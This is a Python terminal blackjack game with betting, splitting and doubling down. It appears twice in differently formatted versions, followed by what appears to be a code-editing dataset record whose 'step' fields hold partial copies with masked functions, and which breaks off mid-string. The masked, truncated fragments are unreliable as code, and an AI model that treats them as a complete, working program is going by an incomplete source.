        " Double Down: When a player chooses to 'double down', he or she can increase the current bet "
        )
    print(
        """ by 100% in exchange for agreeing to stand after being dealt one more card.
"""
        )
    # Block until the user acknowledges; the entered text is discarded.
    input('Ready to play? Hit any key to continue: ')
    print()
def get_num_players():
    """Prompt for the number of players (1-7) and return it as an int."""
    raw = input('How many people will be playing (up to 7)? Enter a number: ')
    # Re-prompt until the reply is a digit string inside the allowed range.
    while not raw.isdigit() or not 1 <= int(raw) <= 7:
        raw = input('Please enter a number from 1 to 7: ')
    print(
        '\nGreat! Now decide amongst yourselves the order you all will be playing in (who will be Player 1 through 7).\n'
        )
    time.sleep(1)
    return int(raw)
def create_players(num):
    """Ask `num` people for their names and return a list of Player objects.

    Blank names are rejected and re-prompted. Every player starts with a
    bankroll of $1,000.
    """
    roster = []
    for seat in range(num):
        name = input(f'Player {seat + 1}, what is your name? ')
        while name == '':
            name = input('Please enter your name: ')
        roster.append(people.Player(name, 1000))
    print(
        '\nAll players will begin the game with the same amount of $1,000 dollars.\n'
        )
    return roster
def deal(dealer, players):
    """Deal one card to every solvent player, then one to the dealer.

    Assumes the dealer is the final element of `players` (the slice
    below skips it when dealing to the players).
    """
    for person in players[:-1]:
        if not person.check_broke():
            dealer.deal_card(person)
    dealer.deal_card(players[-1])
def place_bets(players):
    """Collect a whole-number bet from each solvent player.

    The dealer (last element of `players`) does not bet. Input is
    re-prompted until it is a digit string no larger than the player's
    bankroll; the accepted amount is stored on `player.bet`.

    Fix: removed the unused local `bets = []` that was never read or
    appended to.
    """
    print('Now, each of you must place your bets.\n')
    for player in players[:-1]:
        if not player.check_broke():
            bet = input(f'Bet for {player.name}: ')
            while not bet.isdigit() or int(bet) > player.money:
                msg = 'Please enter a whole number: '
                if bet.isdigit():
                    # The value parsed, so the only failure is insufficient funds.
                    msg = (
                        "You don't have enough money! Enter a different value: "
                        )
                bet = input(msg)
            player.bet = int(bet)
    print()
def view_hands(players):
    """Display each active hand; the dealer's hole card is shown as '?'.

    Broke players are skipped entirely. A natural blackjack is announced
    together with the bet amount the player wins.
    """
    print('Here are the hands for each player: \n')
    for person in players:
        if isinstance(person, people.Dealer):
            # Only the dealer's first card is revealed at this stage.
            print(f'{person.name}: [{person.hand[0][0]}, ?]')
        elif not person.check_broke():
            print(f'{person.name}: {person.hand}', end='')
            if person.check_blackjack():
                print(f' ==> BLACKJACK!!! -- {person.name} wins ${person.bet}!')
            else:
                print()
    print()
def do_decision(player, dealer, hand_index=0):
    """Prompt `player` for an action on hand `hand_index` and execute it.

    Keeps prompting until the chosen action reports success — e.g. an
    invalid split or double-down returns False and the player must
    choose again.

    Fix: the validation loop accepts upper-case input (it compares
    `choice.lower()`), but the dispatch previously looked up the raw
    string with `choices_dict.get(choice)`, so entering 'S' returned
    None and crashed with "'NoneType' object is not callable". The
    lookup now normalizes case the same way the validation does.
    """
    choices_dict = {'s': stand, 'h': hit, 'p': split, 'd': double_down}
    valid_choice = False
    while not valid_choice:
        choice = input(
            f'{player.name}, what do you want to do (s: stand, h: hit, p: split, d: double down): '
            )
        while choice.lower() not in choices_dict.keys():
            choice = input(
                "Please enter either 's', 'h', 'p', or 'd', corresponding to your choice: "
                )
        valid_choice = choices_dict[choice.lower()](player, dealer, hand_index)
def cycle_decisions(players):
    """Run one round of decisions, then settle all bets against the dealer.

    Non-dealer players (skipping anyone broke or holding a blackjack)
    each choose an action via do_decision(). When the loop reaches the
    dealer, the dealer auto-hits toward a 'hard' 17, then every player's
    hand is settled: money and chips are updated in place on each player.
    Assumes the dealer is the last element of `players` (so settlement
    runs after everyone has acted) — TODO confirm against main().
    """
    dealer = players[-1]
    for p in players:
        if isinstance(p, people.Dealer):
            print(
                f"{p.name} will hit until reaching a hand of at least 'hard' 17 (without an ace counting for 11)."
                )
            sys.stdout.flush()
            time.sleep(0.8)
            # Dealer draws only if the opening hand isn't already done
            # (blackjack/bust) and hasn't reached hard 17 yet.
            if not check_status(p) and not p.check_hard_17():
                hit(p, dealer)
            sys.stdout.flush()
            time.sleep(0.5)
            disp_str_slow('\nEnd-of-Round Earnings: \n', 0.05)
            if p.check_bust():
                # Dealer busted: every non-busted player hand wins its bet,
                # busted hands still lose.
                for i in players[:-1]:
                    if not i.check_broke():
                        sys.stdout.flush()
                        time.sleep(0.5)
                        print(' ', end='')
                        for j in range(0, len(i.hand)):
                            if not i.check_bust(j):
                                print(f'{i.name} wins ${i.bet}! ', end='')
                                i.money += i.bet
                            else:
                                print(f'{i.name} loses ${i.bet}! ', end='')
                                i.money -= i.bet
                        i.chips = chip.convert_to_chips(i.money)
                        if i.check_broke():
                            print(
                                f"Sorry {i.name}, but you're out of money and can no longer play in this game"
                                )
                        else:
                            print(
                                f'Current Balance: ${i.money} (Chips: {i.chips})'
                                )
            else:
                # Dealer stood: compare each surviving hand's value to the
                # dealer's; equal values push (no money changes hands).
                for i in players[:-1]:
                    if not i.check_broke():
                        sys.stdout.flush()
                        time.sleep(0.5)
                        print(' ', end='')
                        for j in range(0, len(i.hand)):
                            if not i.check_bust(j):
                                if i.hand_value(j) > p.hand_value():
                                    print(f'{i.name} wins ${i.bet}! ', end='')
                                    i.money += i.bet
                                elif i.hand_value(j) < p.hand_value():
                                    print(f'{i.name} loses ${i.bet}! ', end='')
                                    i.money -= i.bet
                                else:
                                    print(
                                        f'{i.name} tied with the {p.name}! No change. '
                                        , end='')
                            else:
                                print(f'{i.name} loses ${i.bet}! ', end='')
                                i.money -= i.bet
                        i.chips = chip.convert_to_chips(i.money)
                        if i.check_broke():
                            print(
                                f"Sorry {i.name}, but you're out of money and can no longer play in this game"
                                )
                        else:
                            print(
                                f'Current Balance: ${i.money} (Chips: {i.chips})'
                                )
            sys.stdout.flush()
            time.sleep(0.5)
        elif not p.check_blackjack() and not p.check_broke():
            do_decision(p, dealer)
def stand(player, dealer, hand_index=0):
    """End the player's turn on this hand without drawing a card."""
    message = f'{player.name} stands.\n'
    print(message)
    return True
def hit(player, dealer, hand_index=0):
    """Deal a card to hand `hand_index` and continue until done.

    For a Dealer player: keep drawing automatically until the hand is
    finished (blackjack/bust per check_status) or reaches hard 17.
    For a human player: after each card, ask whether to hit again and
    keep drawing while the answer is 'y' and the hand isn't finished.
    Always returns True so do_decision() treats the action as complete.
    """
    dealer.deal_card(player, hand_index)
    # done becomes True on blackjack or bust (see check_status).
    done = check_status(player, hand_index)
    if isinstance(player, people.Dealer):
        while not player.check_hard_17() and not done:
            time.sleep(0.5)
            dealer.deal_card(player, hand_index)
            done = check_status(player, hand_index)
    else:
        choice = ''
        if not done:
            choice = input("Do you want to hit again ('y' or 'n')? ").lower()
            while choice != 'y' and choice != 'n':
                choice = input("Enter either 'y' or 'n': ")
        while choice == 'y' and not done:
            dealer.deal_card(player, hand_index)
            done = check_status(player, hand_index)
            if not done:
                choice = input("Do you want to hit again ('y' or 'n')? "
                    ).lower()
                while choice != 'y' and choice != 'n':
                    choice = input("Enter either 'y' or 'n': ")
    # Blank line separates this player's output when the hand is still live.
    if not done:
        print()
    return True
def split(player, dealer, hand_index=0):
    """Split a matched pair into two hands and play each in turn.

    Returns False (so the player must choose again) when the two cards
    differ or when doubling the bet would exceed the bankroll; returns
    True once both hands have been played via do_decision().
    """
    first, second = player.hand[hand_index][0], player.hand[hand_index][1]
    if first != second:
        print(
            "You can't split on that hand! You need two identical cards to split. Choose again."
            )
        return False
    if player.bet * 2 > player.money:
        print(
            f"You don't have enough money to split with your current bet (${player.bet} * 2 = ${player.bet * 2})! Choose again."
            )
        return False
    # Replace the original hand with two single-card hands.
    player.hand = [[first], [second]]
    print('Now you will play each hand separately: \n')
    for hand_no in (0, 1):
        print(f'For Hand #{hand_no + 1}: ')
        do_decision(player, dealer, hand_no)
    return True
def double_down(player, dealer, hand_index=0):
    """Double the player's bet, then continue play on this hand.

    Returns False (player must choose again) when doubling would exceed
    the bankroll or when the player has already doubled down this round;
    otherwise the bet is doubled, the flag is set, and play continues
    via do_decision().

    Fix: removed the stray period in the confirmation message, which
    previously printed as 'Bet increased to $X!.'.
    """
    if player.bet * 2 > player.money:
        print(
            f"You don't have enough money to do that (${player.bet} * 2 = ${player.bet * 2})! Choose again."
            )
        return False
    elif player.did_double_down:
        print('You can double down only once! Choose a different option.')
        return False
    player.bet *= 2
    # Guard flag read by the branch above on any later double-down attempt.
    player.did_double_down = True
    print(f'Bet increased to ${player.bet}!')
    do_decision(player, dealer, hand_index)
    return True
def check_status(player, hand_index=0):
    """Print hand `hand_index` with a typing effect and report whether it is done.

    Returns True when the hand is a blackjack or a bust, False otherwise.
    Win/loss amounts are announced only for non-dealer players; the
    dealer just gets the BLACKJACK/BUST banner.
    """
    done = False
    # Build the bracketed hand string for all but the newest card, which
    # is revealed slowly below for dramatic effect.
    hand_string = '['
    for card in player.hand[hand_index][:-1]:
        hand_string += card.__str__() + ', '
    print(f'Current Hand: {hand_string}', end='')
    sys.stdout.flush()
    time.sleep(0.5)
    disp_str_slow(f'{player.hand[hand_index][-1].__str__()}]', 0.05)
    time.sleep(0.5)
    if player.check_blackjack(hand_index):
        disp_str_slow(' ==> BLACKJACK!!! ', 0.05)
        if not isinstance(player, people.Dealer):
            disp_str_slow(f'-- {player.name} wins ${player.bet}!', 0.05)
        print('\n\n', end='')
        done = True
        sys.stdout.flush()
        time.sleep(0.5)
    elif player.check_bust(hand_index):
        disp_str_slow(' ==> BUST! ', 0.05)
        if not isinstance(player, people.Dealer):
            disp_str_slow(f'-- {player.name} loses ${player.bet}!', 0.05)
        print('\n\n', end='')
        done = True
        sys.stdout.flush()
        time.sleep(0.5)
    else:
        print()
    return done
def play_again(players):
    """Ask whether to play another round; return 'y' or 'n'.

    If every player (dealer included) is broke, 'n' is returned
    immediately without prompting.
    """
    print()
    anyone_solvent = any(not member.check_broke() for member in players)
    if not anyone_solvent:
        print()
        return 'n'
    answer = input(
        "Do you all want to play another round? Enter 'y' or 'n': ").lower()
    while answer not in ('y', 'n'):
        answer = input("Enter either 'y' or 'n': ")
    print()
    return answer
def reset(players):
    """Return every player's cards to the dealer and zero all bets.

    The dealer is assumed to be the last element of `players` and is
    reset along with everyone else.
    """
    dealer = players[-1]
    for member in players:
        dealer.retrieve_cards(member)
        member.bet = 0
def display_accounts(players):
    """Print each non-dealer player's final balance and net gain/loss.

    The dealer (last element of `players`) is skipped; output is paced
    with a short pause between players for readability.
    """
    for member in players[:-1]:
        delta = member.money - member.initial_money
        direction = 'loss' if delta < 0 else 'gain'
        print(
            f""" {member.name}: ${member.money} (Chips: {member.chips}), net {direction} of ${abs(delta)}
"""
            )
        sys.stdout.flush()
        time.sleep(0.5)
def disp_str_slow(phrase, t):
    """Type out `phrase` one character at a time, pausing `t` seconds each."""
    out = sys.stdout
    for ch in phrase:
        out.write(ch)
        out.flush()
        time.sleep(t)
def print_players(players):
    """Debug helper: print each player's repr on its own line."""
    for member in players:
        print(member)
def main():
    """Run the full game: setup, betting/dealing rounds, final accounts.

    Builds the player list, appends a Dealer using a 6-deck shoe, then
    loops rounds (reset, bets, two cards each, show hands, decisions)
    until the players decline another round or everyone is broke, and
    finally prints each player's closing balance.
    """
    display_instructions()
    num_players = get_num_players()
    players = create_players(num_players)
    # Dealer goes last so settlement in cycle_decisions() runs after
    # every player has acted.
    dealer = people.Dealer(Deck(6))
    players.append(dealer)
    replay_choice = 'y'
    while replay_choice == 'y':
        reset(players)
        place_bets(players)
        # Two passes so everyone starts the round with two cards.
        for i in range(0, 2):
            deal(dealer, players)
        view_hands(players)
        cycle_decisions(players)
        replay_choice = play_again(players)
    print(
        """------------------------------------------------------------------------------------------------
"""
        )
    disp_str_slow('FINAL PLAYER ACCOUNTS\n\n', 0.05)
    sys.stdout.flush()
    time.sleep(0.5)
    display_accounts(players)
    sys.stdout.flush()
    time.sleep(0.2)
    print(
        """------------------------------------------------------------------------------------------------
"""
        )
    print('Goodbye!')
# Script entry point: run the game only when executed directly.
if __name__ == '__main__':
    main()
<|reserved_special_token_1|>
from card import Card;
from deck import Deck;
import people;
import chip;
import sys;
import time;
def display_instructions() :
    """Print the blackjack rules and pause until the user presses a key."""
    print('\nInstructions: The objective of this game is to obtain a hand of cards whose value is as close to 21 ');
    print('as possible without going over. The numbered cards have the value of their number, face cards have ');
    print('a value of 10 each, and the ace can either be counted as 1 or 11 (player\'s choice)\n');
    print('Each round of the game begins with each player placing a bet. Then, the dealer passes out two cards to ');
    print('each player (up to 7 players) and to the dealer. The player\'s cards will be face up while one of the ');
    print('dealer\'s cards will be face down. Then, each player will choose to either hit, stand, split, or double down: \n');
    print('          Hit:          when a player \'hits,\' he or she is dealt another card. A player can hit as many ');
    print('                        times as wanted, up until the player busts (goes over 21). \n');
    print('          Stand:        To \'stand\' means to stay with the current cards. \n');
    print('          Split:        A player can \'split\' only when the first two cards of his or her hand are the ');
    print('                        same. When this occurs, the player makes two separate piles, one with each ');
    print('                        identical card, and places a bet identical to the initial bet for the second ');
    print('                        pile. Then, the player can hit or stand with each pile as in a normal round.\n');
    print('          Double Down:  When a player chooses to \'double down\', he or she can increase the current bet ');
    print('                        by 100% in exchange for agreeing to stand after being dealt one more card.\n');
    input('Ready to play? Hit any key to continue: ');
    print();
def get_num_players():
    """Prompt for the number of human players (1-7) and return it as an int."""
    reply = input('How many people will be playing (up to 7)? Enter a number: ')
    # Re-prompt until the entry is a digit string in the accepted range.
    while not (reply.isdigit() and 1 <= int(reply) <= 7):
        reply = input('Please enter a number from 1 to 7: ')
    print('\nGreat! Now decide amongst yourselves the order you all will be playing in (who will be Player 1 through 7).\n')
    time.sleep(1)
    return int(reply)
def create_players(num):
    """Ask each of *num* players for a name; return a list of Player objects.

    Every player starts with $1,000.
    """
    roster = []
    for idx in range(num):
        name = input(f'Player {idx + 1}, what is your name? ')
        while name == '':
            name = input('Please enter your name: ')
        roster.append(people.Player(name, 1000))
    print('\nAll players will begin the game with the same amount of $1,000 dollars.\n')
    return roster
def deal(dealer, players):
    """Deal one card to every solvent human player, then one to the dealer."""
    for recipient in players[:-1]:
        if not recipient.check_broke():
            dealer.deal_card(recipient)
    # The dealer (always last in the list) also receives a card.
    dealer.deal_card(players[-1])
def place_bets(players):
    """Prompt every solvent human player for a whole-number bet they can afford.

    Stores the amount on each player's ``bet`` attribute; the dealer
    (players[-1]) never bets.  The original kept an unused ``bets`` list,
    which is removed here.
    """
    print('Now, each of you must place your bets.\n')
    for player in players[:-1]:
        if not player.check_broke():
            bet = input(f'Bet for {player.name}: ')
            # Re-prompt until the entry is a whole number within the bankroll.
            while not bet.isdigit() or int(bet) > player.money:
                msg = 'Please enter a whole number: '
                if bet.isdigit():
                    msg = "You don't have enough money! Enter a different value: "
                bet = input(msg)
            player.bet = int(bet)
    print()
def view_hands(players):
    """Show every participant's hand; the dealer's second card stays hidden."""
    print('Here are the hands for each player: \n')
    for p in players:
        if isinstance(p, people.Dealer):
            # Only the dealer's first card is revealed at this stage.
            print(f'{p.name}: [{p.hand[0][0]}, ?]', end='')
            print()
        elif not p.check_broke():
            print(f'{p.name}: {p.hand}', end='')
            if p.check_blackjack():
                print(f' ==> BLACKJACK!!! -- {p.name} wins ${p.bet}!')
            else:
                print()
    print()
def do_decision(player, dealer, hand_index=0):
    """Prompt *player* for an action and apply it until one succeeds.

    Each action returns True when it completed and False when it could
    not be applied (e.g. splitting without a pair), in which case the
    player is asked again.
    """
    choices_dict = {'s': stand, 'h': hit, 'p': split, 'd': double_down}
    valid_choice = False
    while not valid_choice:
        # BUG FIX: the original validated choice.lower() but dispatched on
        # the raw input, so an upper-case entry like 'S' passed validation
        # and then crashed (dict.get returned None, which was called).
        # Normalise once so validation and dispatch agree.
        choice = input(
            f'{player.name}, what do you want to do (s: stand, h: hit, p: split, d: double down): '
        ).lower()
        while choice not in choices_dict:
            choice = input(
                "Please enter either 's', 'h', 'p', or 'd', corresponding to your choice: "
            ).lower()
        valid_choice = choices_dict[choice](player, dealer, hand_index)
def cycle_decisions(players) :
    """Run the decision phase of a round, then settle every bet.

    Human players act first (via do_decision); the dealer, always
    players[-1], then hits to a 'hard' 17.  Each surviving hand is
    compared to the dealer's and players' money/chips are updated in
    place.
    """
    dealer = players[-1];
    for p in players :
        if isinstance(p, people.Dealer) :
            # Dealer's turn runs last because the dealer is last in the list.
            print(f'{p.name} will hit until reaching a hand of at least \'hard\' 17 (without an ace counting for 11).');
            sys.stdout.flush();
            time.sleep(0.8);
            if not check_status(p) and not p.check_hard_17() : hit(p, dealer);
            sys.stdout.flush();
            time.sleep(0.5);
            disp_str_slow('\nEnd-of-Round Earnings: \n', 0.05);
            if p.check_bust() :
                # Dealer busted: every non-busted hand wins its bet.
                for i in players[:-1] :
                    if not i.check_broke() :
                        sys.stdout.flush();
                        time.sleep(0.5);
                        print('    ', end='');
                        for j in range(0,len(i.hand)) : # this is to loop through each hand for a player (player would have multiple hands after splitting)
                            if not i.check_bust(j) :
                                print(f'{i.name} wins ${i.bet}! ', end='');
                                i.money += i.bet;
                            else :
                                print(f'{i.name} loses ${i.bet}! ', end='');
                                i.money -= i.bet;
                        # NOTE(review): after a split each hand pays/charges the
                        # full bet -- confirm this matches the intended payout.
                        i.chips = chip.convert_to_chips(i.money);
                        if i.check_broke() :
                            print(f'Sorry {i.name}, but you\'re out of money and can no longer play in this game');
                        else :
                            print(f'Current Balance: ${i.money} (Chips: {i.chips})');
            else :
                # Dealer stood: compare each surviving hand's value to the dealer's.
                for i in players[:-1] :
                    if not i.check_broke() :
                        sys.stdout.flush();
                        time.sleep(0.5);
                        print('    ', end='');
                        for j in range(0,len(i.hand)) :
                            if not i.check_bust(j) :
                                if i.hand_value(j) > p.hand_value() :
                                    print(f'{i.name} wins ${i.bet}! ', end='');
                                    i.money += i.bet;
                                elif i.hand_value(j) < p.hand_value() :
                                    print(f'{i.name} loses ${i.bet}! ', end='');
                                    i.money -= i.bet;
                                else :
                                    print(f'{i.name} tied with the {p.name}! No change. ', end='');
                            else :
                                print(f'{i.name} loses ${i.bet}! ', end='');
                                i.money -= i.bet;
                        i.chips = chip.convert_to_chips(i.money);
                        if i.check_broke() :
                            print(f'Sorry {i.name}, but you\'re out of money and can no longer play in this game');
                        else :
                            print(f'Current Balance: ${i.money} (Chips: {i.chips})');
                        sys.stdout.flush();
                        time.sleep(0.5);
        else :
            # Humans with money who don't already have blackjack get a turn.
            if not p.check_blackjack() and not p.check_broke() :
                do_decision(p, dealer);
def stand(player, dealer, hand_index=0):
    """End the player's turn, keeping the current hand.  Always succeeds.

    The unused parameters keep the signature interchangeable with the
    other actions dispatched from do_decision.
    """
    print(f'{player.name} stands.\n')
    return True
def hit(player, dealer, hand_index=0) :
    """Deal cards to *player* until they stop, bust, or reach blackjack.

    The dealer hits automatically until a 'hard' 17; human players are
    re-prompted after each card.  Always returns True so do_decision
    treats the action as carried out.
    """
    dealer.deal_card(player, hand_index);
    done = check_status(player, hand_index);
    if isinstance(player, people.Dealer) :
        # Dealer has no choice: keep drawing until hard 17, bust or blackjack.
        while not player.check_hard_17() and not done:
            time.sleep(0.5);
            dealer.deal_card(player, hand_index);
            done = check_status(player, hand_index);
    else :
        choice = '';
        if not done :
            choice = input('Do you want to hit again (\'y\' or \'n\')? ').lower();
            while choice != 'y' and choice != 'n' :
                choice = input('Enter either \'y\' or \'n\': ');
        # Keep dealing while the player says yes and the hand is still live.
        while choice == 'y' and not done:
            dealer.deal_card(player, hand_index);
            done = check_status(player, hand_index);
            if not done :
                choice = input('Do you want to hit again (\'y\' or \'n\')? ').lower();
                while choice != 'y' and choice != 'n' :
                    choice = input('Enter either \'y\' or \'n\': ');
    if not done : print();
    return True;
def split(player, dealer, hand_index=0) :
    """Split a pair into two hands and play each one separately.

    Returns False (so do_decision re-prompts) when the hand is not a
    pair or the player cannot cover the doubled stake; True otherwise.
    """
    # NOTE(review): relies on Card equality for the pair test -- confirm
    # Card defines __eq__ (and whether equal rank alone should qualify).
    if player.hand[hand_index][0] != player.hand[hand_index][1] :
        print('You can\'t split on that hand! You need two identical cards to split. Choose again.');
        return False;
    elif player.bet*2 > player.money :
        print(f'You don\'t have enough money to split with your current bet (${player.bet} * 2 = ${player.bet*2})! Choose again.');
        return False;
    # Replace the player's hand list with the two single-card hands.
    # NOTE(review): this discards any other existing hands, so a second
    # split in the same round would clobber the first -- verify intended.
    hands = [[player.hand[hand_index][0]], [player.hand[hand_index][1]]];
    player.hand = hands;
    print('Now you will play each hand separately: \n');
    for i in range(0,2) :
        print(f'For Hand #{i+1}: ');
        do_decision(player, dealer, i);
    return True;
def double_down(player, dealer, hand_index=0) :
    """Double the player's bet (allowed once per round), then continue.

    Returns False when the player cannot afford the doubled bet or has
    already doubled down; True once the doubled turn has been played.
    """
    if player.bet*2 > player.money :
        print(f'You don\'t have enough money to do that (${player.bet} * 2 = ${player.bet*2})! Choose again.');
        return False;
    elif player.did_double_down :
        print('You can double down only once! Choose a different option.');
        return False;
    player.bet *= 2;
    player.did_double_down = True;
    print(f'Bet increased to ${player.bet}!.');
    # NOTE(review): standard double-down forces exactly one more card then a
    # stand, but this re-enters the full action prompt -- confirm house rule.
    do_decision(player, dealer, hand_index);
    return True;
def check_status(player, hand_index=0) :
    """Display the current hand and report whether the turn has ended.

    Returns True on blackjack or bust (announcing the result for human
    players), False when play may continue.  Money is not adjusted here;
    settlement happens in cycle_decisions.
    """
    done = False;
    hand_string = '[';
    for card in player.hand[hand_index][:-1] :
        hand_string += card.__str__() + ', ';
    # Print all but the newest card at once, then reveal the newest slowly.
    print(f'Current Hand: {hand_string}', end='');
    sys.stdout.flush();
    time.sleep(0.5);
    disp_str_slow(f'{player.hand[hand_index][-1].__str__()}]', 0.05);
    time.sleep(0.5);
    if player.check_blackjack(hand_index) :
        disp_str_slow(' ==> BLACKJACK!!! ', 0.05);
        if not isinstance(player, people.Dealer) :
            disp_str_slow(f'-- {player.name} wins ${player.bet}!', 0.05);
        print('\n\n', end='');
        done = True;
        sys.stdout.flush();
        time.sleep(0.5);
    elif player.check_bust(hand_index) :
        disp_str_slow(' ==> BUST! ', 0.05);
        if not isinstance(player, people.Dealer) :
            disp_str_slow(f'-- {player.name} loses ${player.bet}!', 0.05);
        print('\n\n', end='');
        done = True;
        sys.stdout.flush();
        time.sleep(0.5);
    else :
        print();
    return done;
def play_again(players):
    """Ask whether to start another round.

    Returns 'y' to continue or 'n' to stop.  Automatically returns 'n'
    when every human player is broke.  The dealer (players[-1]) never
    bets, so it is excluded from the broke check — the original
    included it, matching no other broke check in this file.
    """
    print()
    # Only human players hold a bankroll; consider players[:-1] only.
    if all(p.check_broke() for p in players[:-1]):
        print()
        return 'n'
    choice = input(
        "Do you all want to play another round? Enter 'y' or 'n': ").lower()
    while choice != 'y' and choice != 'n':
        choice = input("Enter either 'y' or 'n': ")
    print()
    return choice
def reset(players):
    """Return all dealt cards to the dealer and clear every bet."""
    dealer = players[-1]
    for participant in players:
        dealer.retrieve_cards(participant)
        participant.bet = 0
def display_accounts(players):
    """Print each human player's closing balance and net gain or loss."""
    for player in players[:-1]:
        change = player.money - player.initial_money
        word = 'loss' if change < 0 else 'gain'
        print(f'    {player.name}: ${player.money} (Chips: {player.chips}), net {word} of ${abs(change)}\n')
        sys.stdout.flush()
        time.sleep(0.5)
def disp_str_slow(phrase, t):
    """Print *phrase* character by character with a t-second delay each."""
    for character in phrase:
        print(character, end='')
        sys.stdout.flush()
        time.sleep(t)
def print_players(players):
    """Debug helper: print each player's string form, one per line."""
    for member in players:
        print(member)
def main() :
    """Run the interactive blackjack game from setup to the final summary."""
    display_instructions();
    num_players = get_num_players();
    players = create_players(num_players);
    # The dealer plays from a six-deck shoe and always sits last in the list.
    dealer = people.Dealer(Deck(6));
    players.append(dealer);
    replay_choice = 'y';
    while replay_choice == 'y' :
        reset(players);
        place_bets(players);
        # Two passes so every participant starts the round with two cards.
        for i in range(0,2) :
            deal(dealer, players);
        view_hands(players);
        cycle_decisions(players);
        replay_choice = play_again(players);
    print('------------------------------------------------------------------------------------------------\n');
    disp_str_slow('FINAL PLAYER ACCOUNTS\n\n', 0.05);
    sys.stdout.flush();
    time.sleep(0.5)
    display_accounts(players);
    sys.stdout.flush();
    time.sleep(0.2)
    print('------------------------------------------------------------------------------------------------\n');
    print('Goodbye!');
# Script entry point: run the game only when executed directly.
if __name__ == '__main__' :
    main();
|
flexible
|
{
"blob_id": "a7050ebd545c4169b481672aed140af610aea997",
"index": 4879,
"step-1": "<mask token>\n\n\ndef create_players(num):\n players_list = []\n for i in range(num):\n name = input(f'Player {i + 1}, what is your name? ')\n while name == '':\n name = input('Please enter your name: ')\n players_list.append(people.Player(name, 1000))\n print(\n '\\nAll players will begin the game with the same amount of $1,000 dollars.\\n'\n )\n return players_list\n\n\n<mask token>\n\n\ndef view_hands(players):\n print('Here are the hands for each player: \\n')\n for p in players:\n if isinstance(p, people.Dealer):\n print(f'{p.name}: [{p.hand[0][0]}, ?]', end='')\n print()\n elif not p.check_broke():\n print(f'{p.name}: {p.hand}', end='')\n if p.check_blackjack():\n print(f' ==> BLACKJACK!!! -- {p.name} wins ${p.bet}!')\n else:\n print()\n print()\n\n\ndef do_decision(player, dealer, hand_index=0):\n choices_dict = {'s': stand, 'h': hit, 'p': split, 'd': double_down}\n valid_choice = False\n while not valid_choice:\n choice = input(\n f'{player.name}, what do you want to do (s: stand, h: hit, p: split, d: double down): '\n )\n while choice.lower() not in choices_dict.keys():\n choice = input(\n \"Please enter either 's', 'h', 'p', or 'd', corresponding to your choice: \"\n )\n valid_choice = choices_dict.get(choice)(player, dealer, hand_index)\n\n\n<mask token>\n\n\ndef split(player, dealer, hand_index=0):\n if player.hand[hand_index][0] != player.hand[hand_index][1]:\n print(\n \"You can't split on that hand! You need two identical cards to split. Choose again.\"\n )\n return False\n elif player.bet * 2 > player.money:\n print(\n f\"You don't have enough money to split with your current bet (${player.bet} * 2 = ${player.bet * 2})! 
Choose again.\"\n )\n return False\n hands = [[player.hand[hand_index][0]], [player.hand[hand_index][1]]]\n player.hand = hands\n print('Now you will play each hand separately: \\n')\n for i in range(0, 2):\n print(f'For Hand #{i + 1}: ')\n do_decision(player, dealer, i)\n return True\n\n\n<mask token>\n\n\ndef reset(players):\n dealer = players[-1]\n for player in players:\n dealer.retrieve_cards(player)\n player.bet = 0\n\n\ndef display_accounts(players):\n for player in players[:-1]:\n change = player.money - player.initial_money\n word = 'gain'\n if change < 0:\n word = 'loss'\n print(\n f\"\"\" {player.name}: ${player.money} (Chips: {player.chips}), net {word} of ${abs(change)}\n\"\"\"\n )\n sys.stdout.flush()\n time.sleep(0.5)\n\n\ndef disp_str_slow(phrase, t):\n for i in phrase:\n print(i, end='')\n sys.stdout.flush()\n time.sleep(t)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef display_instructions():\n print(\n \"\"\"\nInstructions: The objective of this game is to obtain a hand of cards whose value is as close to 21 \"\"\"\n )\n print(\n 'as possible without going over. The numbered cards have the value of their number, face cards have '\n )\n print(\n \"a value of 10 each, and the ace can either be counted as 1 or 11 (player's choice)\\n\"\n )\n print(\n 'Each round of the game begins with each player placing a bet. Then, the dealer passes out two cards to '\n )\n print(\n \"each player (up to 7 players) and to the dealer. The player's cards will be face up while one of the \"\n )\n print(\n \"\"\"dealer's cards will be face down. Then, each player will choose to either hit, stand, split, or double down: \n\"\"\"\n )\n print(\n \" Hit: when a player 'hits,' he or she is dealt another card. A player can hit as many \"\n )\n print(\n ' times as wanted, up until the player busts (goes over 21). \\n'\n )\n print(\n \" Stand: To 'stand' means to stay with the current cards. \\n\"\n )\n print(\n \" Split: A player can 'split' only when the first two cards of his or her hand are the \"\n )\n print(\n ' same. When this occurs, the player makes two separate piles, one with each '\n )\n print(\n ' identical card, and places a bet identical to the initial bet for the second '\n )\n print(\n \"\"\" pile. Then, the player can hit or stand with each pile as in a normal round.\n\"\"\"\n )\n print(\n \" Double Down: When a player chooses to 'double down', he or she can increase the current bet \"\n )\n print(\n \"\"\" by 100% in exchange for agreeing to stand after being dealt one more card.\n\"\"\"\n )\n input('Ready to play? Hit any key to continue: ')\n print()\n\n\ndef get_num_players():\n num = input('How many people will be playing (up to 7)? Enter a number: ')\n while not num.isdigit() or int(num) < 1 or int(num) > 7:\n num = input('Please enter a number from 1 to 7: ')\n print(\n \"\"\"\nGreat! 
Now decide amongst yourselves the order you all will be playing in (who will be Player 1 through 7).\n\"\"\"\n )\n time.sleep(1)\n return int(num)\n\n\ndef create_players(num):\n players_list = []\n for i in range(num):\n name = input(f'Player {i + 1}, what is your name? ')\n while name == '':\n name = input('Please enter your name: ')\n players_list.append(people.Player(name, 1000))\n print(\n '\\nAll players will begin the game with the same amount of $1,000 dollars.\\n'\n )\n return players_list\n\n\ndef deal(dealer, players):\n for player in players[:-1]:\n if not player.check_broke():\n dealer.deal_card(player)\n dealer.deal_card(players[-1])\n\n\ndef place_bets(players):\n print('Now, each of you must place your bets.\\n')\n bets = []\n for player in players[:-1]:\n if not player.check_broke():\n bet = input(f'Bet for {player.name}: ')\n while not bet.isdigit() or int(bet) > player.money:\n msg = 'Please enter a whole number: '\n if bet.isdigit():\n msg = (\n \"You don't have enough money! Enter a different value: \"\n )\n bet = input(msg)\n player.bet = int(bet)\n print()\n\n\ndef view_hands(players):\n print('Here are the hands for each player: \\n')\n for p in players:\n if isinstance(p, people.Dealer):\n print(f'{p.name}: [{p.hand[0][0]}, ?]', end='')\n print()\n elif not p.check_broke():\n print(f'{p.name}: {p.hand}', end='')\n if p.check_blackjack():\n print(f' ==> BLACKJACK!!! 
